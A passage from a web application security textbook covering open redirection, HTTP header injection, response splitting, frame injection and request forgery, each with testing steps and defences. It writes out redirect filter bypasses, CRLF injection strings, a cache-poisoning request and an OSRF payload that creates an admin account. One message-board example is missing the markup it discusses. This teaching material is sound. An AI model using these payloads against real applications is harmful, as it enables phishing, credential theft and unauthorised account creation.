data can be employed as a defense-in-depth measure, in order to detect

requests that may contain malicious exploits for DOM-based XSS flaws. In the

same example just described, it would actually be possible for an application

to prevent an attack by employing only server-side data validation, by verify-

ing that:

■ The query string contains a single parameter.

■ The parameter’s name is message (case-sensitive check).

■ The parameter’s value contains only alphanumeric content.

With these controls in place, it would still be necessary for the client-side

script to parse out the value of the

message parameter properly, ensuring that

any fragment portion of the URL was not included.
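As a rough sketch of these two checks, the following shows one way the server-side verification and the fragment-safe client-side parsing might look. The function names isExpectedQuery and extractMessage are hypothetical, and the example assumes an environment that provides the standard URL class.

```javascript
// Server-side style check on the raw query string (without the leading "?").
function isExpectedQuery(query) {
  const pairs = query.split("&");
  if (pairs.length !== 1) return false;        // exactly one parameter
  const eq = pairs[0].indexOf("=");
  if (eq === -1) return false;
  const name = pairs[0].slice(0, eq);
  const value = pairs[0].slice(eq + 1);
  if (name !== "message") return false;        // case-sensitive name check
  return /^[A-Za-z0-9]*$/.test(value);         // alphanumeric content only
}

// Client-side extraction: the URL parser separates the fragment from the
// query string, so data placed after "#" never reaches the returned value.
function extractMessage(url) {
  return new URL(url).searchParams.get("message");
}
```

Parsing the URL into its components, rather than taking a substring after "message=", is what keeps fragment data (which the server never sees) out of the value written into the page.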


Validate Output

As with reflected XSS flaws, applications can perform HTML-encoding of

user-controllable DOM data before this is inserted into the document. This will

enable all kinds of potentially dangerous characters and expressions to be dis-

played within the page in a safe way. HTML encoding can be implemented in

client-side JavaScript with a function like the following:

function sanitize(str)
{
    var d = document.createElement('div');
    d.appendChild(document.createTextNode(str));
    return d.innerHTML;
}
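Where no DOM is available, or where the encoded value will be placed inside a quoted attribute, a purely string-based encoder is a possible alternative. The sketch below is an assumption-laden illustration (the name htmlEncode and the choice of five characters are not taken from the original text). Unlike text-node serialization, which typically leaves quotation marks untouched, it also encodes both quote characters.

```javascript
// Hypothetical string-based HTML encoder; "&" must be replaced first so that
// the entities produced by the later replacements are not double-encoded.
function htmlEncode(str) {
  return String(str)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}
```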

Preventing XST

The XST technique depends upon finding some XSS flaw that allows the

attacker to insert arbitrary JavaScript into a page viewed by another user.

Hence, eliminating all XSS vulnerabilities ought to remove any opportunities

for an attacker to use the technique. Nevertheless, it is recommended both that

all cookies are flagged as

HttpOnly and that the TRACE method is disabled on

the web server hosting the application.

Redirection Attacks

Redirection vulnerabilities arise when an application takes user-controllable

input and uses this to perform a redirection, instructing the user’s browser to

visit a different URL than the one requested. They are usually of less interest to

an attacker than cross-site scripting vulnerabilities, which can be used to per-

form a much wider range of malicious actions. Redirection bugs are primarily

of use in phishing attacks where an attacker seeks to induce a victim to visit a

spoofed web site and enter sensitive details. A redirection vulnerability can

lend credibility to the attacker’s overtures to potential victims, because it

enables him to construct a URL which points to the authentic web site he is tar-

geting, and which is therefore more convincing, but which causes anyone who

visits it to be redirected silently to a web site controlled by the attacker.

In fact, many applications actually perform redirects to third-party sites as

part of their normal function — for example, to process customer payments.

This encourages users to perceive that redirection during a transaction is not

necessarily indicative of anything suspicious. An attacker can take advantage

of this perception when exploiting redirection vulnerabilities.


Finding and Exploiting Redirection Vulnerabilities

The first step in locating redirection vulnerabilities is to identify every instance

within the application where a redirect occurs. There are several ways in which

an application can cause the user’s browser to redirect to a different URL:

■ An HTTP redirect uses a message with a 3xx status code and a Location
header specifying the target of the redirect. For example:

HTTP/1.1 302 Object moved
Location: https://wahh-app.com/showDetails.php?uid=19821

■ The HTTP Refresh header can be used to reload a page with an arbitrary
URL after a fixed interval, which may be zero to trigger an immediate
redirect. For example:

HTTP/1.1 200 OK
Refresh: 0; url=https://wahh-app.com/showDetails.php?uid=19821

■ The HTML <meta> tag can be used to replicate the behavior of any
HTTP header and can, therefore, be used for redirection. For example:

HTTP/1.1 200 OK
Content-Length: 125

<html>
<head>
<meta http-equiv="refresh" content=
"0;url=https://wahh-app.com/showDetails.php?uid=19821">
</head>
</html>

■ Various APIs exist within JavaScript that can be used to redirect the
browser to an arbitrary URL. For example:

HTTP/1.1 200 OK
Content-Length: 120

<html>
<head>
<script>
document.location="https://wahh-app.com/showDetails.php?uid=19821";
</script>
</head>
</html>


In each of these cases, an absolute or relative URL may be specified.

HACK STEPS

■ Identify every instance within the application where a redirect occurs.

■ An effective way to achieve this is to walk through the application using

an intercepting proxy, and monitor the requests made for actual pages

(as opposed to other resources like images, style sheets, script files, etc.).

■ If a single navigation action results in more than one request in succes-

sion, investigate what means of performing the redirect is being used.
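When reviewing proxy history, the four mechanisms listed earlier can be recognized with a few simple checks. The following is only a sketch under stated assumptions: the response object shape (status, lower-cased headers, body) and the function name findRedirectMechanisms are hypothetical, and the regular expressions are deliberately loose heuristics rather than a complete parser.

```javascript
// response: { status: number, headers: { "lower-case-name": value }, body: string }
function findRedirectMechanisms(response) {
  const found = [];
  const headers = response.headers || {};
  const body = response.body || "";
  // 3xx status code with a Location header
  if (response.status >= 300 && response.status < 400 && headers["location"]) {
    found.push("http-location");
  }
  // Refresh response header
  if (headers["refresh"]) found.push("refresh-header");
  // <meta http-equiv="refresh" ...> within the HTML
  if (/<meta[^>]+http-equiv\s*=\s*["']?refresh/i.test(body)) {
    found.push("meta-refresh");
  }
  // Assignment to a location property within script code
  if (/(document\.location|window\.location|location\.href)\s*=/.test(body)) {
    found.push("javascript");
  }
  return found;
}
```

A response that yields an empty list may still redirect by other script APIs, so a negative result from this kind of check should be treated as a prompt for manual review, not as proof.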

The majority of redirects are not user-controllable. For example, in a typical
login mechanism, submitting valid credentials to /login.jsp might return an
HTTP redirect to /myhome.jsp. The target of the redirect is always the same, so
it is not subject to any vulnerabilities involving redirection.

However, in other cases, data supplied by the user is used in some way to

set the target of the redirect. A common instance of this is where an application

forces users whose sessions have expired to return to the login page and then

redirects them back to the original URL following successful reauthentication.

If you encounter this type of behavior, then the application may be vulnerable

to a redirection attack, and you should investigate further to determine

whether the behavior is exploitable.

HACK STEPS

■ If the user data being processed in a redirect contains an absolute URL,

modify the domain name within the URL, and test whether the applica-

tion redirects you to the different domain.

■ If the user data being processed contains a relative URL, modify this into

an absolute URL for a different domain, and test whether the application

redirects you to this domain.

■ In both cases, if you see behavior like the following, then the application

is certainly vulnerable to an arbitrary redirection attack:

GET /redir.php?target=http://wahh-attacker.com/ HTTP/1.1

Host: wahh-app.com

HTTP/1.1 302 Object moved

Location: http://wahh-attacker.com/
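The comparison made in these steps can be expressed as a small check. This is a sketch only: the function name isExternalRedirect is hypothetical, and it assumes the standard URL class is available to resolve relative Location values against the requested URL.

```javascript
// Returns true when the redirect target resolves to a different host
// than the URL that was originally requested.
function isExternalRedirect(requestUrl, locationHeader) {
  const base = new URL(requestUrl);
  const target = new URL(locationHeader, base); // resolves relative targets
  return target.host !== base.host;
}
```

Resolving the Location value before comparing hosts matters, because a value such as //wahh-attacker.com contains no scheme yet still leads to an external site.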


Circumventing Obstacles to Attack

It is very common to encounter situations in which user-controllable data is

being used to form the target of a redirect, but is being filtered or sanitized in

some way by the application, usually in an attempt to block redirection

attacks. In this situation, the application may or may not be vulnerable, and

your next task should be to probe the defenses in place to determine whether

they can be circumvented to perform arbitrary redirection. The two general

types of defense you may encounter are attempts to block absolute URLs, and

the addition of a specific absolute URL prefix.

Blocking of Absolute URLs

The application may check whether the user-supplied string starts with

http://, and if so, then block the request. In this situation, the following tricks

may succeed in causing a redirect to an external web site:

HtTp://wahh-attacker.com

%00http://wahh-attacker.com

http://wahh-attacker.com [note the leading space]

//wahh-attacker.com

%68%74%74%70%3a%2f%2fwahh-attacker.com

%2568%2574%2574%2570%253a%252f%252fwahh-attacker.com

https://wahh-attacker.com

Alternatively, the application may attempt to sanitize absolute URLs by

removing

http:// and any external domain specified. In this situation, any of

the preceding bypasses may be successful, and the following attacks should

also be tested:

http://http://wahh-attacker.com

http://wahh-attacker.com/http://wahh-attacker.com

hthttp://tp://wahh-attacker.com

Sometimes, the application may verify that the user-supplied string either

starts with or contains an absolute URL to its own domain name. In this situa-

tion, the following bypasses may be effective:

http://wahh-app.com.wahh-attacker.com

http://wahh-attacker.com/?http://wahh-app.com

http://wahh-attacker.com/%23http://wahh-app.com
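To see why these bypasses work, it can help to model the kind of naive defense they target. The three functions below are hypothetical stand-ins for flawed filters of the sorts described in this section. They are assumptions made for illustration and are not code from any real application.

```javascript
// Naive defense 1: block anything that starts with "http://" (case-sensitive).
function isBlockedAsAbsolute(target) {
  return target.startsWith("http://");
}

// Naive defense 2: strip the first occurrence of "http://" only.
function stripHttpOnce(target) {
  return target.replace("http://", "");
}

// Naive defense 3: accept anything that contains the application's own URL.
function containsOwnDomain(target) {
  return target.includes("http://wahh-app.com");
}

// None of these payloads is caught by defense 1.
const unblocked = ["HtTp://wahh-attacker.com", "//wahh-attacker.com", "https://wahh-attacker.com"]
  .filter((t) => !isBlockedAsAbsolute(t));

// Defense 2 reassembles an absolute URL from the nested payload.
const rebuilt = stripHttpOnce("hthttp://tp://wahh-attacker.com");

// Defense 3 accepts a URL whose actual host belongs to the attacker.
const accepted = containsOwnDomain("http://wahh-app.com.wahh-attacker.com");
```

In each case the filter reasons about the string, while the browser reasons about the parsed URL, and the gap between the two is what the attacker exploits.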


Addition of an Absolute Prefix

The application may form the target of the redirect by appending the user-

controllable string to an absolute URL prefix. For example:

GET /redir.php?target=/private/admin.php HTTP/1.1

Host: wahh-app.com

HTTP/1.1 302 Object moved

Location: http://wahh-app.com/private/admin.php

In this situation, the application may or may not be vulnerable. If the prefix

used consists of

http:// and the application’s domain name but does not

include a slash character after the domain name, then it is vulnerable. For

example, the URL

http://wahh-app.com/redir.php?target=.wahh-attacker.com

will cause a redirect to

http://wahh-app.com.wahh-attacker.com

which is under the control of the attacker, assuming that he controls the DNS

records for the domain

wahh-attacker.com.
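The effect of the missing slash can be confirmed by parsing the resulting URLs. This is a small sketch assuming the standard URL class. The helper name redirectHost is hypothetical.

```javascript
// Concatenates the fixed prefix with the user-supplied string, as the
// application does, and reports which host the browser would contact.
function redirectHost(prefix, userTarget) {
  return new URL(prefix + userTarget).hostname;
}

const withoutSlash = redirectHost("http://wahh-app.com", ".wahh-attacker.com");
const withSlash = redirectHost("http://wahh-app.com/", ".wahh-attacker.com");
```

Without the trailing slash, the user-supplied string extends the hostname itself. With it, the same string can only ever become part of the path on the original host.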

If, however, the absolute URL prefix does include a trailing slash, or a sub-

directory on the server, then the application is probably not vulnerable to a

redirection attack aimed at an external domain. The best an attacker can prob-

ably achieve is to frame a URL that redirects a user to a different URL within

the same application. This attack does not normally accomplish anything,

because if the attacker is able to induce a user to visit one URL within the

application, then he can presumably just as easily feed the second URL to them

directly.

NOTE In cases where the redirect is initiated using client-side JavaScript that

queries data from the DOM, the entire code responsible for performing the

redirect and any associated validation is typically visible on the client. This

should be closely reviewed to determine how user-controllable data is being

incorporated into the URL, whether any validation is being performed, and if so,

whether any bypasses exist to the validation. Bear in mind that as with DOM-

based XSS, some additional validation may be performed on the server prior to

the script being returned to the browser. The following JavaScript APIs may be

used to perform redirects:

■ document.location

■ document.URL

■ document.open()

■ window.location.href

■ window.navigate()

■ window.open()

Preventing Redirection Vulnerabilities

The most effective way to avoid arbitrary redirection vulnerabilities is to not

incorporate user-supplied data into the target of a redirect at all. There are var-

ious reasons why developers are inclined to use this technique, but there are

usually alternatives available. For example, it is common to see a user interface

that contains a list of links, each pointing to a redirection page and passing a

target URL as a parameter. Here, possible alternative approaches include the

following:

■ Remove the redirection page from the application, and replace links to
it with direct links to the relevant target URLs.

■ Maintain a list of all valid URLs for redirection. Instead of passing the
target URL as a parameter to the redirect page, pass an index into this
list. The redirect page should look up the index in its list and return a
redirect to the relevant URL.
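The index-based approach might be sketched as follows. The list contents, the name REDIRECT_TARGETS, and the function resolveRedirect are all hypothetical. A real application would populate the list with its own known-good targets.

```javascript
// Hypothetical list of every URL the redirect page is allowed to send users to.
const REDIRECT_TARGETS = [
  "https://wahh-app.com/help",
  "https://wahh-app.com/contact",
  "https://payments.example.com/checkout",
];

// Accepts only a decimal index and returns the matching URL, or null.
function resolveRedirect(indexParam) {
  if (!/^[0-9]+$/.test(indexParam)) return null; // digits only
  const index = Number(indexParam);
  return index < REDIRECT_TARGETS.length ? REDIRECT_TARGETS[index] : null;
}
```

Because the user supplies only a position in a server-side list, no part of the redirect target is ever derived from user input.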

If it is considered unavoidable for the redirection page to receive user-

controllable input and incorporate this into the redirect target, one of the fol-

lowing measures should be used to minimize the risk of redirection attacks:

■ The application should use relative URLs in all of its redirects, and the
redirect page should strictly validate that the URL received is a relative
URL. It should verify that the user-supplied URL either begins with a
single slash followed by a letter or begins with a letter and does not
contain a colon character before the first slash. Any other input should
be rejected, not sanitized.

■ The application should use URLs relative to the web root for all of its
redirects, and the redirect page should prepend http://yourdomainname.com
to all user-supplied URLs before issuing the redirect. If the user-supplied
URL does not begin with a slash character, it should instead be
prepended with http://yourdomainname.com/.

■ The application should use absolute URLs for all redirects, and the
redirect page should verify that the user-supplied URL begins with
http://yourdomainname.com/ before issuing the redirect. Any other
input should be rejected.
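The relative-URL rule in the first of these measures translates fairly directly into code. The following is a minimal sketch of that rule as stated, with a hypothetical function name. It rejects any input that fails the check and makes no attempt to repair it.

```javascript
// Accepts a URL only if it begins with a single slash followed by a letter,
// or begins with a letter and has no colon before the first slash.
function isSafeRelativeUrl(url) {
  if (/^\/[A-Za-z]/.test(url)) return true;
  if (/^[A-Za-z]/.test(url)) {
    const slash = url.indexOf("/");
    const colon = url.indexOf(":");
    // Safe if there is no colon at all, or the first colon follows a slash.
    return colon === -1 || (slash !== -1 && colon > slash);
  }
  return false;
}
```

The colon test is what excludes scheme-bearing inputs such as http://wahh-attacker.com, while the single-slash test excludes scheme-relative inputs such as //wahh-attacker.com.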


As with DOM-based XSS vulnerabilities, it is recommended that applica-

tions do not perform redirects via client-side scripts on the basis of DOM data,

as this data is outside of the server’s direct control.

HTTP Header Injection

HTTP header injection vulnerabilities arise when user-controllable data is

inserted in an unsafe manner into an HTTP header returned by the applica-

tion. If an attacker can inject newline characters into the header he controls, he

can insert additional HTTP headers into the response and can write arbitrary

content into the body of the response.

This vulnerability arises most commonly in relation to the

Location and

Set-Cookie headers, but it may conceivably occur for any HTTP header. You

saw previously how an application may take user-supplied input and insert

this into the

Location header of a 3xx response. In a similar way, some appli-

cations take user-supplied input and insert this into the value of a cookie. For

example:

GET /home.php?uid=123 HTTP/1.1

Host: wahh-app.com

HTTP/1.1 200 OK

Set-Cookie: UserId=123

...

In either of these cases, it may be possible for an attacker to construct a
crafted request using the carriage-return (0x0d) and/or line-feed (0x0a)
characters to inject a newline into the header he controls, and so insert
further data on the following line. For example:

GET /home.php?uid=123%0d%0aFoo:+bar HTTP/1.1

Host: wahh-app.com

HTTP/1.1 200 OK

Set-Cookie: UserId=123

Foo: bar

...
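The behavior shown above can be reproduced with a toy model of the vulnerable code path. This sketch assumes a server that URL-decodes the uid parameter and concatenates it into the Set-Cookie header without any checks. The function name buildResponseHead is hypothetical.

```javascript
// Simulates the vulnerable server: decode the parameter, then copy it
// straight into a response header.
function buildResponseHead(uidParam) {
  const uid = decodeURIComponent(uidParam.replace(/\+/g, " "));
  return "HTTP/1.1 200 OK\r\n" + "Set-Cookie: UserId=" + uid + "\r\n";
}

// Each element is one line of the response as a client would parse it.
const headerLines = buildResponseHead("123%0d%0aFoo:+bar").split("\r\n");
```

The decoded carriage return and line feed terminate the Set-Cookie line early, so the remainder of the attacker's input is parsed as a header in its own right.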

Exploiting Header Injection Vulnerabilities

Potential header injection vulnerabilities can be detected in a similar way to

XSS vulnerabilities, since you are looking for cases where user-controllable

input reappears anywhere within the HTTP headers returned by the applica-

tion. Hence, in the course of probing the application for XSS vulnerabilities,


you should also identify any locations where the application may be vulnera-

ble to header injection.

HACK STEPS

■ For each potentially vulnerable instance in which user-controllable input

is copied into an HTTP header, verify whether the application accepts

data containing URL-encoded carriage-return (%0d) and line-feed (%0a)

characters, and whether these are returned unsanitized in its response.

■ Note that you are looking for the actual newline characters themselves to

appear in the server’s response, not their URL-encoded equivalents. If

you view the response in an intercepting proxy, you should actually see

an additional line in the HTTP headers if the attack was successful.

■ If only one of the two newline characters is returned in the server’s

responses, it may still be possible to craft a working exploit, depending

on the context.

■ If you find that newline characters are being blocked or sanitized by the

application, then the following bypasses should be attempted:

foo%00%0d%0abar

foo%250d%250abar

foo%%0d0d%%0a0abar

If it is possible to inject arbitrary headers and message body content into the

response, then this behavior can be used to attack other users of the applica-

tion in various ways.

Injecting Cookies

A URL can be constructed that sets arbitrary cookies within the browser of any

user who requests it. For example:

GET /redir.php?target=/%0d%0aSet-cookie:+SessId%3d120a12f98e8; HTTP/1.1

Host: wahh-app.com

HTTP/1.1 302 Object moved

Location: /

Set-cookie: SessId=120a12f98e8;

If suitably configured, these cookies may persist across different browser

sessions. Target users can be induced to access the malicious URL via the same

delivery mechanisms that were described for reflected XSS vulnerabilities

(email, third-party web site, etc.).


Depending on the application, setting a particular cookie may interfere

with the application’s logic to the disadvantage of the user (for example,

UseHttps=false). Also, setting an attacker-controlled session token may be

used to perform a session fixation attack (described later in this chapter).

Delivering Other Attacks

Because HTTP header injection enables an attacker to control the entire body

of a response, it can be used as a delivery mechanism for practically any attack

against other users, including virtual web site defacement, script injection,

arbitrary redirection, attacks against ActiveX controls, and so on.

HTTP Response Splitting

This is an attack technique which seeks to poison a proxy server’s cache with

malicious content, in order to compromise other users who access the applica-

tion via the proxy. For example, if all users on a corporate network access an

application via a caching proxy, the attacker can target them by injecting mali-

cious content into the proxy’s cache, which will be displayed to any users who

request the affected page.

A header injection vulnerability can be exploited to deliver a response split-

ting attack using the following steps:

1. The attacker chooses a page of the application that he wishes to poison

within the proxy cache. For example, he might replace the page at

/admin/ with a Trojan login form that submits the user’s credentials to

the attacker’s server.

2. The attacker locates a header injection vulnerability and formulates a

request that injects an entire HTTP body into the response, plus a sec-

ond set of response headers, and a second response body. The second

response body contains the HTML source code for his Trojan login

form. The effect is that the server’s response looks exactly like two sep-

arate HTTP responses chained together. Hence the name of the attack

technique, because the attacker has effectively “split” the server’s

response into two separate responses. For example:

GET /home.php?uid=123%0d%0aContent-Length:+22%0d%0a%0d%0a<html>%0d%

0afoo%0d%0a</html>%0d%0aHTTP/1.1+200+OK%0d%0aContent-Length:

+2307%0d%0a%0d%0a<html>%0d%0a<head>%0d%0a<title>Administrator+login

</title>%0d%0a[...long URL...] HTTP/1.1

Host: wahh-app.com


HTTP/1.1 200 OK

Set-Cookie: UserId=123

Content-Length: 22

<html>

foo

</html>

HTTP/1.1 200 OK

Content-Length: 2307

<html>

<head>

<title>Administrator login</title>

...

3. The attacker opens a TCP connection to the proxy server and sends his

crafted request followed immediately by a request for the page to be

poisoned. Pipelining requests in this way is legal in the HTTP protocol:

GET http://wahh-app.com/home.php?uid=123%0d%0aContent-Length:+22%0d

%0a%0d%0a<html>%0d%0afoo%0d%0a</html>%0d%0aHTTP/1.1+200+OK%0d%

0aContent-Length:+2307%0d%0a%0d%0a<html>%0d%0a<head>%0d%0a

<title>Administrator+login</title>%0d%0a[...long URL...] HTTP/1.1

Host: wahh-app.com

Proxy-Connection: Keep-alive

GET http://wahh-app.com/admin/ HTTP/1.1

Host: wahh-app.com

Proxy-Connection: Close

4. The proxy server opens a TCP connection to the application, and sends

the two requests pipelined in the same way.

5. The application responds to the first request with the attacker’s injected

HTTP content, which looks exactly like two separate HTTP responses.

6. The proxy server receives these two apparent responses, and interprets
the second as being the response to the attacker’s second pipelined
request, which was for the URL http://wahh-app.com/admin/. The proxy
caches this second response as the contents of this URL. (If the proxy
has already stored a cached copy of the page, the attacker can cause it
to re-request the URL and update its cache with the new version by
inserting an appropriate If-Modified-Since header into his second
request and a Last-Modified header into the injected response.)


7. The application issues its actual response to the attacker’s second
request, containing the authentic contents of the URL
http://wahh-app.com/admin/. The proxy server does not recognize this as
being a response to a request that it has actually issued, and so discards it.

8. A user accesses http://wahh-app.com/admin/ via the proxy server and
receives the content of this URL which was stored in the proxy’s cache.
This content is in fact the attacker’s Trojan login form, so the user’s
credentials are compromised.
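The central trick in steps 2, 5, and 6 is that a party reading the byte stream and honoring Content-Length will see two responses where the server sent one. The following simulation is a sketch under several assumptions: the functions vulnerableResponse and splitResponses are hypothetical, the stream is treated as ASCII so that string length equals byte length, and the parser is far simpler than any real proxy.

```javascript
// Simulates a vulnerable server that copies the decoded uid into Set-Cookie.
function vulnerableResponse(uid) {
  const body = "<html>real home page</html>";
  return "HTTP/1.1 200 OK\r\n" +
    "Set-Cookie: UserId=" + uid + "\r\n" +
    "Content-Length: " + body.length + "\r\n\r\n" + body;
}

// Reads responses from a stream the way a simple proxy might: headers up to
// the first blank line, then exactly Content-Length characters of body.
function splitResponses(stream) {
  const responses = [];
  let rest = stream;
  while (rest.startsWith("HTTP/1.1 ")) {
    const headEnd = rest.indexOf("\r\n\r\n");
    if (headEnd === -1) break;
    const head = rest.slice(0, headEnd);
    const match = /^Content-Length:\s*(\d+)/im.exec(head);
    const length = match ? Number(match[1]) : 0;
    const bodyStart = headEnd + 4;
    responses.push({ head: head, body: rest.slice(bodyStart, bodyStart + length) });
    rest = rest.slice(bodyStart + length);
  }
  return responses;
}
```

Feeding the parser a response built from a uid that carries its own Content-Length header, a short body, and a complete second response yields two entries. The server's genuine headers and body are left over at the end of the stream and are never interpreted.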

Preventing Header Injection Vulnerabilities

The most effective way to prevent HTTP header injection vulnerabilities is to

not insert user-controllable input into the HTTP headers returned by the appli-

cation. As you saw with arbitrary redirection vulnerabilities, there are usually

safer alternatives available to this behavior.

If it is considered unavoidable to insert user-controllable data into HTTP

headers, the application should employ a twofold defense-in-depth approach

to prevent any vulnerabilities arising:

■ Input validation: The application should perform context-dependent
validation of the data being inserted, in as strict a manner as possible.
For example, if a cookie value is being set based on user input, it may
be appropriate to restrict this to alphabetical characters only, and a
maximum length of six bytes.

■ Output validation: Every piece of data being inserted into headers
should be filtered to detect potentially malicious characters. In practice,
any character with an ASCII code below 0x20 should be regarded as
suspicious, and the request should be rejected.
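Both layers are simple to express in code. The sketch below uses the example limits given above (alphabetical characters, at most six of them, and rejection of any character below 0x20). The function names are hypothetical, and a real application would choose limits that fit its own data.

```javascript
// Input validation: the example cookie rule of one to six letters.
function isValidCookieInput(value) {
  return /^[A-Za-z]{1,6}$/.test(value);
}

// Output validation: reject any value containing a character below 0x20,
// which covers carriage return (0x0d), line feed (0x0a), and null (0x00).
function isSafeHeaderValue(value) {
  for (let i = 0; i < value.length; i++) {
    if (value.charCodeAt(i) < 0x20) return false;
  }
  return true;
}
```

The output check should run on the final, fully decoded value immediately before it is written into the header, so that no later decoding step can reintroduce a newline.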

Applications can prevent any remaining header injection vulnerabilities

from being used to poison proxy server caches by using HTTPS for all appli-

cation content.

Frame Injection

Frame injection is a relatively simple vulnerability that arises from the fact that

in many browsers, if a web site creates a named frame, then any window

opened by the same browser process is permitted to write the contents of that

frame, even if its own content was issued by a different web site.


NOTE The latest versions of most browsers have modified their behavior in

relation to named frames and, by default, extend the same origin policy to

prevent one web site from writing the content of a frame that was issued by a

different domain. As users gradually migrate to the latest browsers, this

category of vulnerability will cease to be relevant.

HACK STEPS

■ If the application uses frames, review the HTML source of the main

browser window, which should contain the code for the frameset.

■ If the frameset assigns a name to each frame, it is probably vulnerable,

as in the following example, indicated by the presence of the name

attribute in the tag that creates each frame:

<frameset>
<frame src="top_menu.asp" name="top_menu"
frameborder="yes" title="Top menu">
<frame src="left_menu.asp" name="left_menu"
frameborder="yes" title="Left menu">
<frame src="main_display.asp" name="main_display"
frameborder="yes" title="Main display">
</frameset>

■ If the frameset uses named frames, but the names appear to be highly

cryptic or random, access the application several times from different

browsers, and review whether the frame names change. If they do so,

and there is no way for an attacker to predict the names of other users’

frames, then the application is probably not vulnerable.

Exploiting Frame Injection

If the application is vulnerable to frame injection, then an attacker can exploit

this using the following steps:

1. The attacker creates an innocuous-looking web site containing a script

that wakes up every 10 seconds and attempts to overwrite the contents

of the frame named

main_display. The new content is hosted on the

attacker’s site and contains Trojan functionality that looks identical to

the normal

wahh-app.com content, but transmits any entered data to the

attacker.

2. The attacker either waits for

wahh-app.com users to browse to his

innocuous site, or uses some proactive means of inducing them to do

so, such as sending emails, buying banner ads, and so on.


3. A user browses the attacker’s innocuous-looking web site. If the user is
simultaneously using wahh-app.com, or does so while the attacker’s site
is being displayed in another browser window, then the attacker’s Trojan
content will overwrite the frame main_display in the wahh-app.com
window. If the user continues using what appears to be the wahh-app.com
application, then any data he enters will be submitted to the attacker.

This type of attack bears similarities to phishing attacks in which the

attacker constructs a cloned web site and seeks to entice unwitting users to

access it. However, in the case of frame injection, the attack is more sophisti-

cated and much more convincing, because the cloned content actually replaces

the authentic content within a browser window whose URL still points to the

genuine application.

If the application being targeted uses HTTPS, then the attack will still suc-

ceed, and the security padlock displayed by the browser window will con-

tinue to show the correct certificate for

wahh-app.com. This is because when a

browser displays a frameset, the security information for the main window

relates to the page containing the frameset, which in this case still originates

from

wahh-app.com. Hence, even a well-informed user may not notice an

attack of this kind.

Preventing Frame Injection

There are two available mitigations to frame injection vulnerabilities:

■ If there is no requirement for the application’s different frames to
intercommunicate, remove frame names altogether and make them anonymous.
However, because intercommunication is normally required, this
option is usually not feasible.

■ Use named frames but make them unique to each session and unpredictable.
One possible option is to append the user’s session token to
each base frame name such as main_display.

Request Forgery

This category of attack (also known as session riding) is closely related to ses-

sion hijacking attacks, in which an attacker captures a user’s session token and

so is able to use the application “as” that user. With request forgery, however,

the attacker need never actually know the victim’s session token. Rather, the

attacker exploits the normal behavior of web browsers in order to hijack a


user’s token, causing it to be used to make requests that the user does not

intend to make.

Request forgery vulnerabilities come in two flavors: on-site and cross-site.

On-Site Request Forgery

On-site request forgery (OSRF) is a familiar attack payload for exploiting

stored XSS vulnerabilities. In the MySpace worm, Samy placed a script within

his profile that caused any user viewing the profile to perform various unwit-

ting actions. What is often overlooked is that stored OSRF vulnerabilities can

exist even in situations where XSS is not possible.

Consider a message board application that lets users submit items that are

viewed by other users. Messages are submitted using a request like the

following:

POST /submit.php HTTP/1.1

Host: wahh-app.com

Content-Length: 34

type=question&name=daf&message=foo

This request results in the following being added to the messages page:

<tr>

</tr>

In this situation, you would of course test for XSS flaws. However, suppose
that the application is properly HTML-encoding any " < and > characters that
it inserts into the page. Having satisfied yourself that this defense cannot be
bypassed in any way, you might move on to the next test.

But look again. You control part of the target of the

<img> tag. Although you

cannot break out of the quoted string, you can modify the URL to cause any

user who views your message to make an arbitrary on-site

GET request. For

example, submitting the following value in the

type parameter will cause any-

one viewing your message to make a request that attempts to add a new

administrative user:

../admin/newUser.php?username=daf2&password=0wned&role=admin#

When an ordinary user is induced to issue your crafted request, it will of

course fail. But when an administrator views your message, your backdoor

account gets created. You have performed a successful OSRF attack even


though XSS was not possible. And of course, the attack will succeed even if

administrators take the precaution of disabling JavaScript.

In the preceding attack string, note the

# character that effectively termi-

nates the URL before the

.gif suffix. You could just as easily use & to incorpo-

rate the suffix as a further request parameter.
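The effect of both suffix-handling tricks can be checked with a few lines of JavaScript. This is a minimal sketch that assumes the page builds the image URL as "/images/" + type + ".gif"; that prefix, the page name messages.php, and the helper resolveImageTarget are illustrative assumptions, not details confirmed for the application.

```javascript
// Assumption: the page emits <img src="/images/{type}.gif">.
// The "/images/" prefix and the page URL are illustrative only.
function resolveImageTarget(type, pageUrl) {
  const src = "/images/" + type + ".gif";
  // Resolve the src the same way a browser resolves a relative URL.
  return new URL(src, pageUrl);
}

const page = "http://wahh-app.com/messages.php";
const attack = "../admin/newUser.php?username=daf2&password=0wned&role=admin";

const benign = resolveImageTarget("question", page);
const hashVariant = resolveImageTarget(attack + "#", page);
const ampVariant = resolveImageTarget(attack + "&", page);

console.log(benign.pathname);      // path of the ordinary icon request
console.log(hashVariant.pathname); // path after "../" is resolved
console.log(hashVariant.hash);     // the .gif suffix, pushed into the fragment
console.log(ampVariant.search);    // the .gif suffix, absorbed as a parameter
```

Browsers do not send the fragment to the server, so in the # variant the .gif suffix never reaches the application. In the & variant it arrives as an extra parameter that the target function will most likely ignore.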

HACK STEPS

■ In every location where data submitted by one user is displayed to other

users but you are unable to perform a stored XSS attack, review whether

the application’s behavior leaves it vulnerable to OSRF.

■ The vulnerability typically arises where user-supplied data is inserted

into the target of a hyperlink or other URL within the returned page.

Unless the application specifically blocks any characters you require (typ-

ically dots, slashes, and the delimiters used in the query string), it is

almost certainly vulnerable.

■ If you discover an OSRF vulnerability, look for a suitable request to target

in your exploit, as described in the next section for XSRF.

OSRF vulnerabilities can be prevented by validating user input as strictly as

possible before it is incorporated into responses. For example, in the specific

case described, the application could verify that the

type parameter has one of

a specific range of values. If the application must accept other values that it

cannot anticipate in advance, then input containing any of the characters
/ . \ ? & and = should be blocked.
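The validation just described might look like the following sketch. The set of permitted type values is hypothetical (the example request shows only "question"), and the function name isSafeType is an assumption introduced for illustration.

```javascript
// Hypothetical whitelist; only "question" appears in the example request.
const ALLOWED_TYPES = new Set(["question", "answer", "comment"]);

// The characters the text recommends blocking: / . \ ? & =
const BLOCKED_CHARS = /[\/.\\?&=]/;

function isSafeType(value, allowUnknown = false) {
  if (typeof value !== "string" || value.length === 0) return false;
  // Preferred check: the value is one of a specific range of values.
  if (ALLOWED_TYPES.has(value)) return true;
  // Fallback for applications that must accept unanticipated values.
  return allowUnknown && !BLOCKED_CHARS.test(value);
}

console.log(isSafeType("question"));
console.log(isSafeType("../admin/newUser.php?username=daf2&password=0wned&role=admin#"));
console.log(isSafeType("poll", true));
```

The check should run on the decoded value that will actually be written into the page, so that an encoded slash or dot cannot slip past it.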

